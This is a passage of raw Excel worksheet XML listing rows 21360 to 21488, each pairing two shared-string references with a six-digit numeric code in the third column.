        <v>813480</v>
      </c>
    </row>
    <row r="21360" spans="1:3">
      <c r="A21360" s="28" t="s">
        <v>26945</v>
      </c>
      <c r="B21360" s="14" t="s">
        <v>17445</v>
      </c>
      <c r="C21360" s="15">
        <v>813490</v>
      </c>
    </row>
    <row r="21361" spans="1:3">
      <c r="A21361" s="28" t="s">
        <v>26945</v>
      </c>
      <c r="B21361" s="14" t="s">
        <v>17445</v>
      </c>
      <c r="C21361" s="15">
        <v>813580</v>
      </c>
    </row>
    <row r="21362" spans="1:3">
      <c r="A21362" s="28" t="s">
        <v>26945</v>
      </c>
      <c r="B21362" s="14" t="s">
        <v>17445</v>
      </c>
      <c r="C21362" s="15">
        <v>813590</v>
      </c>
    </row>
    <row r="21363" spans="1:3">
      <c r="A21363" s="28" t="s">
        <v>26945</v>
      </c>
      <c r="B21363" s="14" t="s">
        <v>17445</v>
      </c>
      <c r="C21363" s="15">
        <v>813645</v>
      </c>
    </row>
    <row r="21364" spans="1:3">
      <c r="A21364" s="28" t="s">
        <v>26945</v>
      </c>
      <c r="B21364" s="14" t="s">
        <v>17445</v>
      </c>
      <c r="C21364" s="15">
        <v>813660</v>
      </c>
    </row>
    <row r="21365" spans="1:3">
      <c r="A21365" s="28" t="s">
        <v>26945</v>
      </c>
      <c r="B21365" s="14" t="s">
        <v>17445</v>
      </c>
      <c r="C21365" s="15">
        <v>813667</v>
      </c>
    </row>
    <row r="21366" spans="1:3">
      <c r="A21366" s="28" t="s">
        <v>26945</v>
      </c>
      <c r="B21366" s="14" t="s">
        <v>17445</v>
      </c>
      <c r="C21366" s="15">
        <v>813670</v>
      </c>
    </row>
    <row r="21367" spans="1:3">
      <c r="A21367" s="28" t="s">
        <v>26945</v>
      </c>
      <c r="B21367" s="14" t="s">
        <v>17445</v>
      </c>
      <c r="C21367" s="15">
        <v>813755</v>
      </c>
    </row>
    <row r="21368" spans="1:3">
      <c r="A21368" s="28" t="s">
        <v>24870</v>
      </c>
      <c r="B21368" s="14" t="s">
        <v>8649</v>
      </c>
      <c r="C21368" s="15">
        <v>814290</v>
      </c>
    </row>
    <row r="21369" spans="1:3">
      <c r="A21369" s="28" t="s">
        <v>24870</v>
      </c>
      <c r="B21369" s="14" t="s">
        <v>8649</v>
      </c>
      <c r="C21369" s="15">
        <v>814480</v>
      </c>
    </row>
    <row r="21370" spans="1:3">
      <c r="A21370" s="28" t="s">
        <v>24870</v>
      </c>
      <c r="B21370" s="14" t="s">
        <v>8649</v>
      </c>
      <c r="C21370" s="15">
        <v>814490</v>
      </c>
    </row>
    <row r="21371" spans="1:3">
      <c r="A21371" s="28" t="s">
        <v>24870</v>
      </c>
      <c r="B21371" s="14" t="s">
        <v>8649</v>
      </c>
      <c r="C21371" s="15">
        <v>814545</v>
      </c>
    </row>
    <row r="21372" spans="1:3">
      <c r="A21372" s="28" t="s">
        <v>24870</v>
      </c>
      <c r="B21372" s="14" t="s">
        <v>8649</v>
      </c>
      <c r="C21372" s="15">
        <v>814580</v>
      </c>
    </row>
    <row r="21373" spans="1:3">
      <c r="A21373" s="28" t="s">
        <v>24870</v>
      </c>
      <c r="B21373" s="14" t="s">
        <v>8649</v>
      </c>
      <c r="C21373" s="15">
        <v>814590</v>
      </c>
    </row>
    <row r="21374" spans="1:3">
      <c r="A21374" s="28" t="s">
        <v>24870</v>
      </c>
      <c r="B21374" s="14" t="s">
        <v>8649</v>
      </c>
      <c r="C21374" s="15">
        <v>814667</v>
      </c>
    </row>
    <row r="21375" spans="1:3">
      <c r="A21375" s="28" t="s">
        <v>24870</v>
      </c>
      <c r="B21375" s="14" t="s">
        <v>8649</v>
      </c>
      <c r="C21375" s="15">
        <v>814670</v>
      </c>
    </row>
    <row r="21376" spans="1:3">
      <c r="A21376" s="28" t="s">
        <v>24870</v>
      </c>
      <c r="B21376" s="14" t="s">
        <v>8649</v>
      </c>
      <c r="C21376" s="15">
        <v>814674</v>
      </c>
    </row>
    <row r="21377" spans="1:3">
      <c r="A21377" s="28" t="s">
        <v>24870</v>
      </c>
      <c r="B21377" s="14" t="s">
        <v>8649</v>
      </c>
      <c r="C21377" s="15">
        <v>814867</v>
      </c>
    </row>
    <row r="21378" spans="1:3">
      <c r="A21378" s="28" t="s">
        <v>26946</v>
      </c>
      <c r="B21378" s="14" t="s">
        <v>17446</v>
      </c>
      <c r="C21378" s="15">
        <v>815590</v>
      </c>
    </row>
    <row r="21379" spans="1:3">
      <c r="A21379" s="28" t="s">
        <v>26946</v>
      </c>
      <c r="B21379" s="14" t="s">
        <v>17446</v>
      </c>
      <c r="C21379" s="15">
        <v>815667</v>
      </c>
    </row>
    <row r="21380" spans="1:3">
      <c r="A21380" s="28" t="s">
        <v>26946</v>
      </c>
      <c r="B21380" s="14" t="s">
        <v>17446</v>
      </c>
      <c r="C21380" s="15">
        <v>815674</v>
      </c>
    </row>
    <row r="21381" spans="1:3">
      <c r="A21381" s="28" t="s">
        <v>26946</v>
      </c>
      <c r="B21381" s="14" t="s">
        <v>17446</v>
      </c>
      <c r="C21381" s="15">
        <v>815767</v>
      </c>
    </row>
    <row r="21382" spans="1:3">
      <c r="A21382" s="28" t="s">
        <v>26946</v>
      </c>
      <c r="B21382" s="14" t="s">
        <v>17446</v>
      </c>
      <c r="C21382" s="15">
        <v>815845</v>
      </c>
    </row>
    <row r="21383" spans="1:3">
      <c r="A21383" s="28" t="s">
        <v>26947</v>
      </c>
      <c r="B21383" s="14" t="s">
        <v>17447</v>
      </c>
      <c r="C21383" s="15">
        <v>816290</v>
      </c>
    </row>
    <row r="21384" spans="1:3">
      <c r="A21384" s="28" t="s">
        <v>26947</v>
      </c>
      <c r="B21384" s="14" t="s">
        <v>17447</v>
      </c>
      <c r="C21384" s="15">
        <v>816460</v>
      </c>
    </row>
    <row r="21385" spans="1:3">
      <c r="A21385" s="28" t="s">
        <v>26947</v>
      </c>
      <c r="B21385" s="14" t="s">
        <v>17447</v>
      </c>
      <c r="C21385" s="15">
        <v>816480</v>
      </c>
    </row>
    <row r="21386" spans="1:3">
      <c r="A21386" s="28" t="s">
        <v>26947</v>
      </c>
      <c r="B21386" s="14" t="s">
        <v>17447</v>
      </c>
      <c r="C21386" s="15">
        <v>816490</v>
      </c>
    </row>
    <row r="21387" spans="1:3">
      <c r="A21387" s="28" t="s">
        <v>26947</v>
      </c>
      <c r="B21387" s="14" t="s">
        <v>17447</v>
      </c>
      <c r="C21387" s="15">
        <v>816545</v>
      </c>
    </row>
    <row r="21388" spans="1:3">
      <c r="A21388" s="28" t="s">
        <v>26947</v>
      </c>
      <c r="B21388" s="14" t="s">
        <v>17447</v>
      </c>
      <c r="C21388" s="15">
        <v>816550</v>
      </c>
    </row>
    <row r="21389" spans="1:3">
      <c r="A21389" s="28" t="s">
        <v>26948</v>
      </c>
      <c r="B21389" s="14" t="s">
        <v>17447</v>
      </c>
      <c r="C21389" s="15">
        <v>816560</v>
      </c>
    </row>
    <row r="21390" spans="1:3">
      <c r="A21390" s="28" t="s">
        <v>26949</v>
      </c>
      <c r="B21390" s="14" t="s">
        <v>17447</v>
      </c>
      <c r="C21390" s="15">
        <v>816570</v>
      </c>
    </row>
    <row r="21391" spans="1:3">
      <c r="A21391" s="28" t="s">
        <v>26947</v>
      </c>
      <c r="B21391" s="14" t="s">
        <v>17447</v>
      </c>
      <c r="C21391" s="15">
        <v>816580</v>
      </c>
    </row>
    <row r="21392" spans="1:3">
      <c r="A21392" s="28" t="s">
        <v>26947</v>
      </c>
      <c r="B21392" s="14" t="s">
        <v>17447</v>
      </c>
      <c r="C21392" s="15">
        <v>816590</v>
      </c>
    </row>
    <row r="21393" spans="1:3">
      <c r="A21393" s="28" t="s">
        <v>26947</v>
      </c>
      <c r="B21393" s="14" t="s">
        <v>17447</v>
      </c>
      <c r="C21393" s="15">
        <v>816626</v>
      </c>
    </row>
    <row r="21394" spans="1:3">
      <c r="A21394" s="28" t="s">
        <v>26947</v>
      </c>
      <c r="B21394" s="14" t="s">
        <v>17447</v>
      </c>
      <c r="C21394" s="15">
        <v>816645</v>
      </c>
    </row>
    <row r="21395" spans="1:3">
      <c r="A21395" s="28" t="s">
        <v>26947</v>
      </c>
      <c r="B21395" s="14" t="s">
        <v>17447</v>
      </c>
      <c r="C21395" s="15">
        <v>816660</v>
      </c>
    </row>
    <row r="21396" spans="1:3">
      <c r="A21396" s="28" t="s">
        <v>26947</v>
      </c>
      <c r="B21396" s="14" t="s">
        <v>17447</v>
      </c>
      <c r="C21396" s="15">
        <v>816667</v>
      </c>
    </row>
    <row r="21397" spans="1:3">
      <c r="A21397" s="28" t="s">
        <v>26949</v>
      </c>
      <c r="B21397" s="14" t="s">
        <v>17447</v>
      </c>
      <c r="C21397" s="15">
        <v>816670</v>
      </c>
    </row>
    <row r="21398" spans="1:3">
      <c r="A21398" s="28" t="s">
        <v>26947</v>
      </c>
      <c r="B21398" s="14" t="s">
        <v>17447</v>
      </c>
      <c r="C21398" s="15">
        <v>816674</v>
      </c>
    </row>
    <row r="21399" spans="1:3">
      <c r="A21399" s="28" t="s">
        <v>26947</v>
      </c>
      <c r="B21399" s="14" t="s">
        <v>17447</v>
      </c>
      <c r="C21399" s="15">
        <v>816755</v>
      </c>
    </row>
    <row r="21400" spans="1:3">
      <c r="A21400" s="28" t="s">
        <v>26947</v>
      </c>
      <c r="B21400" s="14" t="s">
        <v>17447</v>
      </c>
      <c r="C21400" s="15">
        <v>816845</v>
      </c>
    </row>
    <row r="21401" spans="1:3">
      <c r="A21401" s="28" t="s">
        <v>26950</v>
      </c>
      <c r="B21401" s="14" t="s">
        <v>17448</v>
      </c>
      <c r="C21401" s="15">
        <v>817290</v>
      </c>
    </row>
    <row r="21402" spans="1:3">
      <c r="A21402" s="28" t="s">
        <v>26950</v>
      </c>
      <c r="B21402" s="14" t="s">
        <v>17448</v>
      </c>
      <c r="C21402" s="15">
        <v>817480</v>
      </c>
    </row>
    <row r="21403" spans="1:3">
      <c r="A21403" s="28" t="s">
        <v>26950</v>
      </c>
      <c r="B21403" s="14" t="s">
        <v>17448</v>
      </c>
      <c r="C21403" s="15">
        <v>817490</v>
      </c>
    </row>
    <row r="21404" spans="1:3">
      <c r="A21404" s="28" t="s">
        <v>26950</v>
      </c>
      <c r="B21404" s="14" t="s">
        <v>17448</v>
      </c>
      <c r="C21404" s="15">
        <v>817545</v>
      </c>
    </row>
    <row r="21405" spans="1:3">
      <c r="A21405" s="28" t="s">
        <v>26950</v>
      </c>
      <c r="B21405" s="14" t="s">
        <v>17448</v>
      </c>
      <c r="C21405" s="15">
        <v>817555</v>
      </c>
    </row>
    <row r="21406" spans="1:3">
      <c r="A21406" s="28" t="s">
        <v>26950</v>
      </c>
      <c r="B21406" s="14" t="s">
        <v>17448</v>
      </c>
      <c r="C21406" s="15">
        <v>817580</v>
      </c>
    </row>
    <row r="21407" spans="1:3">
      <c r="A21407" s="28" t="s">
        <v>26950</v>
      </c>
      <c r="B21407" s="14" t="s">
        <v>17448</v>
      </c>
      <c r="C21407" s="15">
        <v>817590</v>
      </c>
    </row>
    <row r="21408" spans="1:3">
      <c r="A21408" s="28" t="s">
        <v>26950</v>
      </c>
      <c r="B21408" s="14" t="s">
        <v>17448</v>
      </c>
      <c r="C21408" s="15">
        <v>817667</v>
      </c>
    </row>
    <row r="21409" spans="1:3">
      <c r="A21409" s="28" t="s">
        <v>26950</v>
      </c>
      <c r="B21409" s="14" t="s">
        <v>17448</v>
      </c>
      <c r="C21409" s="15">
        <v>817674</v>
      </c>
    </row>
    <row r="21410" spans="1:3">
      <c r="A21410" s="28" t="s">
        <v>26950</v>
      </c>
      <c r="B21410" s="14" t="s">
        <v>17448</v>
      </c>
      <c r="C21410" s="15">
        <v>817767</v>
      </c>
    </row>
    <row r="21411" spans="1:3">
      <c r="A21411" s="28" t="s">
        <v>26950</v>
      </c>
      <c r="B21411" s="14" t="s">
        <v>17448</v>
      </c>
      <c r="C21411" s="15">
        <v>817855</v>
      </c>
    </row>
    <row r="21412" spans="1:3">
      <c r="A21412" s="28" t="s">
        <v>26951</v>
      </c>
      <c r="B21412" s="14" t="s">
        <v>17449</v>
      </c>
      <c r="C21412" s="15">
        <v>818290</v>
      </c>
    </row>
    <row r="21413" spans="1:3">
      <c r="A21413" s="28" t="s">
        <v>26951</v>
      </c>
      <c r="B21413" s="14" t="s">
        <v>17449</v>
      </c>
      <c r="C21413" s="15">
        <v>818580</v>
      </c>
    </row>
    <row r="21414" spans="1:3">
      <c r="A21414" s="28" t="s">
        <v>26951</v>
      </c>
      <c r="B21414" s="14" t="s">
        <v>17449</v>
      </c>
      <c r="C21414" s="15">
        <v>818590</v>
      </c>
    </row>
    <row r="21415" spans="1:3">
      <c r="A21415" s="28" t="s">
        <v>26951</v>
      </c>
      <c r="B21415" s="14" t="s">
        <v>17449</v>
      </c>
      <c r="C21415" s="15">
        <v>818667</v>
      </c>
    </row>
    <row r="21416" spans="1:3">
      <c r="A21416" s="28" t="s">
        <v>26951</v>
      </c>
      <c r="B21416" s="14" t="s">
        <v>17449</v>
      </c>
      <c r="C21416" s="15">
        <v>818674</v>
      </c>
    </row>
    <row r="21417" spans="1:3">
      <c r="A21417" s="28" t="s">
        <v>26951</v>
      </c>
      <c r="B21417" s="14" t="s">
        <v>17449</v>
      </c>
      <c r="C21417" s="15">
        <v>818767</v>
      </c>
    </row>
    <row r="21418" spans="1:3">
      <c r="A21418" s="28" t="s">
        <v>26951</v>
      </c>
      <c r="B21418" s="14" t="s">
        <v>17449</v>
      </c>
      <c r="C21418" s="15">
        <v>818867</v>
      </c>
    </row>
    <row r="21419" spans="1:3">
      <c r="A21419" s="28" t="s">
        <v>26952</v>
      </c>
      <c r="B21419" s="14" t="s">
        <v>17450</v>
      </c>
      <c r="C21419" s="15">
        <v>819000</v>
      </c>
    </row>
    <row r="21420" spans="1:3">
      <c r="A21420" s="28" t="s">
        <v>26952</v>
      </c>
      <c r="B21420" s="14" t="s">
        <v>17450</v>
      </c>
      <c r="C21420" s="15">
        <v>819290</v>
      </c>
    </row>
    <row r="21421" spans="1:3">
      <c r="A21421" s="28" t="s">
        <v>26952</v>
      </c>
      <c r="B21421" s="14" t="s">
        <v>17450</v>
      </c>
      <c r="C21421" s="15">
        <v>819460</v>
      </c>
    </row>
    <row r="21422" spans="1:3">
      <c r="A21422" s="28" t="s">
        <v>26952</v>
      </c>
      <c r="B21422" s="14" t="s">
        <v>17450</v>
      </c>
      <c r="C21422" s="15">
        <v>819480</v>
      </c>
    </row>
    <row r="21423" spans="1:3">
      <c r="A21423" s="28" t="s">
        <v>26952</v>
      </c>
      <c r="B21423" s="14" t="s">
        <v>17450</v>
      </c>
      <c r="C21423" s="15">
        <v>819490</v>
      </c>
    </row>
    <row r="21424" spans="1:3">
      <c r="A21424" s="28" t="s">
        <v>26952</v>
      </c>
      <c r="B21424" s="14" t="s">
        <v>17450</v>
      </c>
      <c r="C21424" s="15">
        <v>819545</v>
      </c>
    </row>
    <row r="21425" spans="1:3">
      <c r="A21425" s="28" t="s">
        <v>26952</v>
      </c>
      <c r="B21425" s="14" t="s">
        <v>17450</v>
      </c>
      <c r="C21425" s="15">
        <v>819550</v>
      </c>
    </row>
    <row r="21426" spans="1:3">
      <c r="A21426" s="28" t="s">
        <v>26952</v>
      </c>
      <c r="B21426" s="14" t="s">
        <v>17450</v>
      </c>
      <c r="C21426" s="15">
        <v>819555</v>
      </c>
    </row>
    <row r="21427" spans="1:3">
      <c r="A21427" s="28" t="s">
        <v>26953</v>
      </c>
      <c r="B21427" s="14" t="s">
        <v>17451</v>
      </c>
      <c r="C21427" s="15">
        <v>819560</v>
      </c>
    </row>
    <row r="21428" spans="1:3">
      <c r="A21428" s="28" t="s">
        <v>26953</v>
      </c>
      <c r="B21428" s="14" t="s">
        <v>17451</v>
      </c>
      <c r="C21428" s="15">
        <v>819570</v>
      </c>
    </row>
    <row r="21429" spans="1:3">
      <c r="A21429" s="28" t="s">
        <v>26952</v>
      </c>
      <c r="B21429" s="14" t="s">
        <v>17450</v>
      </c>
      <c r="C21429" s="15">
        <v>819580</v>
      </c>
    </row>
    <row r="21430" spans="1:3">
      <c r="A21430" s="28" t="s">
        <v>26952</v>
      </c>
      <c r="B21430" s="14" t="s">
        <v>17450</v>
      </c>
      <c r="C21430" s="15">
        <v>819590</v>
      </c>
    </row>
    <row r="21431" spans="1:3">
      <c r="A21431" s="28" t="s">
        <v>26952</v>
      </c>
      <c r="B21431" s="14" t="s">
        <v>17450</v>
      </c>
      <c r="C21431" s="15">
        <v>819626</v>
      </c>
    </row>
    <row r="21432" spans="1:3">
      <c r="A21432" s="28" t="s">
        <v>26952</v>
      </c>
      <c r="B21432" s="14" t="s">
        <v>17450</v>
      </c>
      <c r="C21432" s="15">
        <v>819645</v>
      </c>
    </row>
    <row r="21433" spans="1:3">
      <c r="A21433" s="28" t="s">
        <v>26953</v>
      </c>
      <c r="B21433" s="14" t="s">
        <v>17451</v>
      </c>
      <c r="C21433" s="15">
        <v>819660</v>
      </c>
    </row>
    <row r="21434" spans="1:3">
      <c r="A21434" s="28" t="s">
        <v>26952</v>
      </c>
      <c r="B21434" s="14" t="s">
        <v>17450</v>
      </c>
      <c r="C21434" s="15">
        <v>819667</v>
      </c>
    </row>
    <row r="21435" spans="1:3">
      <c r="A21435" s="28" t="s">
        <v>26952</v>
      </c>
      <c r="B21435" s="14" t="s">
        <v>17450</v>
      </c>
      <c r="C21435" s="15">
        <v>819670</v>
      </c>
    </row>
    <row r="21436" spans="1:3">
      <c r="A21436" s="28" t="s">
        <v>26952</v>
      </c>
      <c r="B21436" s="14" t="s">
        <v>17450</v>
      </c>
      <c r="C21436" s="15">
        <v>819674</v>
      </c>
    </row>
    <row r="21437" spans="1:3">
      <c r="A21437" s="28" t="s">
        <v>26954</v>
      </c>
      <c r="B21437" s="14" t="s">
        <v>17450</v>
      </c>
      <c r="C21437" s="15">
        <v>819755</v>
      </c>
    </row>
    <row r="21438" spans="1:3">
      <c r="A21438" s="28" t="s">
        <v>26952</v>
      </c>
      <c r="B21438" s="14" t="s">
        <v>17450</v>
      </c>
      <c r="C21438" s="15">
        <v>819767</v>
      </c>
    </row>
    <row r="21439" spans="1:3">
      <c r="A21439" s="28" t="s">
        <v>26952</v>
      </c>
      <c r="B21439" s="14" t="s">
        <v>17450</v>
      </c>
      <c r="C21439" s="15">
        <v>819845</v>
      </c>
    </row>
    <row r="21440" spans="1:3">
      <c r="A21440" s="28" t="s">
        <v>26952</v>
      </c>
      <c r="B21440" s="14" t="s">
        <v>17450</v>
      </c>
      <c r="C21440" s="15">
        <v>819855</v>
      </c>
    </row>
    <row r="21441" spans="1:3">
      <c r="A21441" s="28" t="s">
        <v>26952</v>
      </c>
      <c r="B21441" s="14" t="s">
        <v>17450</v>
      </c>
      <c r="C21441" s="15">
        <v>819867</v>
      </c>
    </row>
    <row r="21442" spans="1:3">
      <c r="A21442" s="28" t="s">
        <v>26955</v>
      </c>
      <c r="B21442" s="14" t="s">
        <v>17452</v>
      </c>
      <c r="C21442" s="15">
        <v>820000</v>
      </c>
    </row>
    <row r="21443" spans="1:3">
      <c r="A21443" s="28" t="s">
        <v>26955</v>
      </c>
      <c r="B21443" s="14" t="s">
        <v>17452</v>
      </c>
      <c r="C21443" s="15">
        <v>820290</v>
      </c>
    </row>
    <row r="21444" spans="1:3">
      <c r="A21444" s="28" t="s">
        <v>26955</v>
      </c>
      <c r="B21444" s="14" t="s">
        <v>17452</v>
      </c>
      <c r="C21444" s="15">
        <v>820460</v>
      </c>
    </row>
    <row r="21445" spans="1:3">
      <c r="A21445" s="28" t="s">
        <v>26955</v>
      </c>
      <c r="B21445" s="14" t="s">
        <v>17452</v>
      </c>
      <c r="C21445" s="15">
        <v>820480</v>
      </c>
    </row>
    <row r="21446" spans="1:3">
      <c r="A21446" s="28" t="s">
        <v>26955</v>
      </c>
      <c r="B21446" s="14" t="s">
        <v>17452</v>
      </c>
      <c r="C21446" s="15">
        <v>820490</v>
      </c>
    </row>
    <row r="21447" spans="1:3">
      <c r="A21447" s="28" t="s">
        <v>26955</v>
      </c>
      <c r="B21447" s="14" t="s">
        <v>17452</v>
      </c>
      <c r="C21447" s="15">
        <v>820550</v>
      </c>
    </row>
    <row r="21448" spans="1:3">
      <c r="A21448" s="28" t="s">
        <v>26955</v>
      </c>
      <c r="B21448" s="14" t="s">
        <v>17452</v>
      </c>
      <c r="C21448" s="15">
        <v>820560</v>
      </c>
    </row>
    <row r="21449" spans="1:3">
      <c r="A21449" s="28" t="s">
        <v>26956</v>
      </c>
      <c r="B21449" s="14" t="s">
        <v>17452</v>
      </c>
      <c r="C21449" s="15">
        <v>820570</v>
      </c>
    </row>
    <row r="21450" spans="1:3">
      <c r="A21450" s="28" t="s">
        <v>26955</v>
      </c>
      <c r="B21450" s="14" t="s">
        <v>17452</v>
      </c>
      <c r="C21450" s="15">
        <v>820580</v>
      </c>
    </row>
    <row r="21451" spans="1:3">
      <c r="A21451" s="28" t="s">
        <v>26955</v>
      </c>
      <c r="B21451" s="14" t="s">
        <v>17452</v>
      </c>
      <c r="C21451" s="15">
        <v>820590</v>
      </c>
    </row>
    <row r="21452" spans="1:3">
      <c r="A21452" s="28" t="s">
        <v>26955</v>
      </c>
      <c r="B21452" s="14" t="s">
        <v>17452</v>
      </c>
      <c r="C21452" s="15">
        <v>820645</v>
      </c>
    </row>
    <row r="21453" spans="1:3">
      <c r="A21453" s="28" t="s">
        <v>26955</v>
      </c>
      <c r="B21453" s="14" t="s">
        <v>17452</v>
      </c>
      <c r="C21453" s="15">
        <v>820660</v>
      </c>
    </row>
    <row r="21454" spans="1:3">
      <c r="A21454" s="28" t="s">
        <v>26955</v>
      </c>
      <c r="B21454" s="14" t="s">
        <v>17452</v>
      </c>
      <c r="C21454" s="15">
        <v>820667</v>
      </c>
    </row>
    <row r="21455" spans="1:3">
      <c r="A21455" s="28" t="s">
        <v>26955</v>
      </c>
      <c r="B21455" s="14" t="s">
        <v>17452</v>
      </c>
      <c r="C21455" s="15">
        <v>820670</v>
      </c>
    </row>
    <row r="21456" spans="1:3">
      <c r="A21456" s="28" t="s">
        <v>26955</v>
      </c>
      <c r="B21456" s="14" t="s">
        <v>17452</v>
      </c>
      <c r="C21456" s="15">
        <v>820674</v>
      </c>
    </row>
    <row r="21457" spans="1:3">
      <c r="A21457" s="28" t="s">
        <v>26955</v>
      </c>
      <c r="B21457" s="14" t="s">
        <v>17452</v>
      </c>
      <c r="C21457" s="15">
        <v>820755</v>
      </c>
    </row>
    <row r="21458" spans="1:3">
      <c r="A21458" s="28" t="s">
        <v>26955</v>
      </c>
      <c r="B21458" s="14" t="s">
        <v>17452</v>
      </c>
      <c r="C21458" s="15">
        <v>820845</v>
      </c>
    </row>
    <row r="21459" spans="1:3">
      <c r="A21459" s="28" t="s">
        <v>26955</v>
      </c>
      <c r="B21459" s="14" t="s">
        <v>17452</v>
      </c>
      <c r="C21459" s="15">
        <v>820867</v>
      </c>
    </row>
    <row r="21460" spans="1:3">
      <c r="A21460" s="28" t="s">
        <v>26957</v>
      </c>
      <c r="B21460" s="14" t="s">
        <v>17453</v>
      </c>
      <c r="C21460" s="15">
        <v>821000</v>
      </c>
    </row>
    <row r="21461" spans="1:3">
      <c r="A21461" s="28" t="s">
        <v>26957</v>
      </c>
      <c r="B21461" s="14" t="s">
        <v>17453</v>
      </c>
      <c r="C21461" s="15">
        <v>821290</v>
      </c>
    </row>
    <row r="21462" spans="1:3">
      <c r="A21462" s="28" t="s">
        <v>26957</v>
      </c>
      <c r="B21462" s="14" t="s">
        <v>17453</v>
      </c>
      <c r="C21462" s="15">
        <v>821460</v>
      </c>
    </row>
    <row r="21463" spans="1:3">
      <c r="A21463" s="28" t="s">
        <v>26957</v>
      </c>
      <c r="B21463" s="14" t="s">
        <v>17453</v>
      </c>
      <c r="C21463" s="15">
        <v>821480</v>
      </c>
    </row>
    <row r="21464" spans="1:3">
      <c r="A21464" s="28" t="s">
        <v>26957</v>
      </c>
      <c r="B21464" s="14" t="s">
        <v>17453</v>
      </c>
      <c r="C21464" s="15">
        <v>821490</v>
      </c>
    </row>
    <row r="21465" spans="1:3">
      <c r="A21465" s="28" t="s">
        <v>26957</v>
      </c>
      <c r="B21465" s="14" t="s">
        <v>17453</v>
      </c>
      <c r="C21465" s="15">
        <v>821545</v>
      </c>
    </row>
    <row r="21466" spans="1:3">
      <c r="A21466" s="28" t="s">
        <v>26957</v>
      </c>
      <c r="B21466" s="14" t="s">
        <v>17453</v>
      </c>
      <c r="C21466" s="15">
        <v>821550</v>
      </c>
    </row>
    <row r="21467" spans="1:3">
      <c r="A21467" s="28" t="s">
        <v>26957</v>
      </c>
      <c r="B21467" s="14" t="s">
        <v>17453</v>
      </c>
      <c r="C21467" s="15">
        <v>821555</v>
      </c>
    </row>
    <row r="21468" spans="1:3">
      <c r="A21468" s="28" t="s">
        <v>26957</v>
      </c>
      <c r="B21468" s="14" t="s">
        <v>17453</v>
      </c>
      <c r="C21468" s="15">
        <v>821560</v>
      </c>
    </row>
    <row r="21469" spans="1:3">
      <c r="A21469" s="28" t="s">
        <v>26957</v>
      </c>
      <c r="B21469" s="14" t="s">
        <v>17453</v>
      </c>
      <c r="C21469" s="15">
        <v>821570</v>
      </c>
    </row>
    <row r="21470" spans="1:3">
      <c r="A21470" s="28" t="s">
        <v>26957</v>
      </c>
      <c r="B21470" s="14" t="s">
        <v>17453</v>
      </c>
      <c r="C21470" s="15">
        <v>821580</v>
      </c>
    </row>
    <row r="21471" spans="1:3">
      <c r="A21471" s="28" t="s">
        <v>26957</v>
      </c>
      <c r="B21471" s="14" t="s">
        <v>17453</v>
      </c>
      <c r="C21471" s="15">
        <v>821590</v>
      </c>
    </row>
    <row r="21472" spans="1:3">
      <c r="A21472" s="28" t="s">
        <v>26957</v>
      </c>
      <c r="B21472" s="14" t="s">
        <v>17453</v>
      </c>
      <c r="C21472" s="15">
        <v>821626</v>
      </c>
    </row>
    <row r="21473" spans="1:3">
      <c r="A21473" s="28" t="s">
        <v>26957</v>
      </c>
      <c r="B21473" s="14" t="s">
        <v>17453</v>
      </c>
      <c r="C21473" s="15">
        <v>821645</v>
      </c>
    </row>
    <row r="21474" spans="1:3">
      <c r="A21474" s="28" t="s">
        <v>26957</v>
      </c>
      <c r="B21474" s="14" t="s">
        <v>17453</v>
      </c>
      <c r="C21474" s="15">
        <v>821660</v>
      </c>
    </row>
    <row r="21475" spans="1:3">
      <c r="A21475" s="28" t="s">
        <v>26957</v>
      </c>
      <c r="B21475" s="14" t="s">
        <v>17453</v>
      </c>
      <c r="C21475" s="15">
        <v>821667</v>
      </c>
    </row>
    <row r="21476" spans="1:3">
      <c r="A21476" s="28" t="s">
        <v>26957</v>
      </c>
      <c r="B21476" s="14" t="s">
        <v>17453</v>
      </c>
      <c r="C21476" s="15">
        <v>821670</v>
      </c>
    </row>
    <row r="21477" spans="1:3">
      <c r="A21477" s="28" t="s">
        <v>26957</v>
      </c>
      <c r="B21477" s="14" t="s">
        <v>17453</v>
      </c>
      <c r="C21477" s="15">
        <v>821674</v>
      </c>
    </row>
    <row r="21478" spans="1:3">
      <c r="A21478" s="28" t="s">
        <v>26957</v>
      </c>
      <c r="B21478" s="14" t="s">
        <v>17453</v>
      </c>
      <c r="C21478" s="15">
        <v>821755</v>
      </c>
    </row>
    <row r="21479" spans="1:3">
      <c r="A21479" s="28" t="s">
        <v>26957</v>
      </c>
      <c r="B21479" s="14" t="s">
        <v>17453</v>
      </c>
      <c r="C21479" s="15">
        <v>821845</v>
      </c>
    </row>
    <row r="21480" spans="1:3">
      <c r="A21480" s="28" t="s">
        <v>26957</v>
      </c>
      <c r="B21480" s="14" t="s">
        <v>17453</v>
      </c>
      <c r="C21480" s="15">
        <v>821867</v>
      </c>
    </row>
    <row r="21481" spans="1:3">
      <c r="A21481" s="28" t="s">
        <v>26958</v>
      </c>
      <c r="B21481" s="14" t="s">
        <v>17454</v>
      </c>
      <c r="C21481" s="15">
        <v>822290</v>
      </c>
    </row>
    <row r="21482" spans="1:3">
      <c r="A21482" s="28" t="s">
        <v>26958</v>
      </c>
      <c r="B21482" s="14" t="s">
        <v>17454</v>
      </c>
      <c r="C21482" s="15">
        <v>822480</v>
      </c>
    </row>
    <row r="21483" spans="1:3">
      <c r="A21483" s="28" t="s">
        <v>26958</v>
      </c>
      <c r="B21483" s="14" t="s">
        <v>17454</v>
      </c>
      <c r="C21483" s="15">
        <v>822490</v>
      </c>
    </row>
    <row r="21484" spans="1:3">
      <c r="A21484" s="28" t="s">
        <v>26958</v>
      </c>
      <c r="B21484" s="14" t="s">
        <v>17454</v>
      </c>
      <c r="C21484" s="15">
        <v>822545</v>
      </c>
    </row>
    <row r="21485" spans="1:3">
      <c r="A21485" s="28" t="s">
        <v>26958</v>
      </c>
      <c r="B21485" s="14" t="s">
        <v>17454</v>
      </c>
      <c r="C21485" s="15">
        <v>822580</v>
      </c>
    </row>
    <row r="21486" spans="1:3">
      <c r="A21486" s="28" t="s">
        <v>26958</v>
      </c>
      <c r="B21486" s="14" t="s">
        <v>17454</v>
      </c>
      <c r="C21486" s="15">
        <v>822590</v>
      </c>
    </row>
    <row r="21487" spans="1:3">
      <c r="A21487" s="28" t="s">
        <v>26958</v>
      </c>
      <c r="B21487" s="14" t="s">
        <v>17454</v>
      </c>
      <c r="C21487" s="15">
        <v>822645</v>
      </c>
    </row>
    <row r="21488" spans="1:3">
      <c r="A21488" s="28" t="s">
        <v>26959</v>
      </c>
      <c r="B21488" s="14" t="s">
        <v>17454</v>
      </c>
      <c r="C21488" s="15">
        <v>822660</v>
      </c>
    </row>
    <row r="21489" spans="1:3">
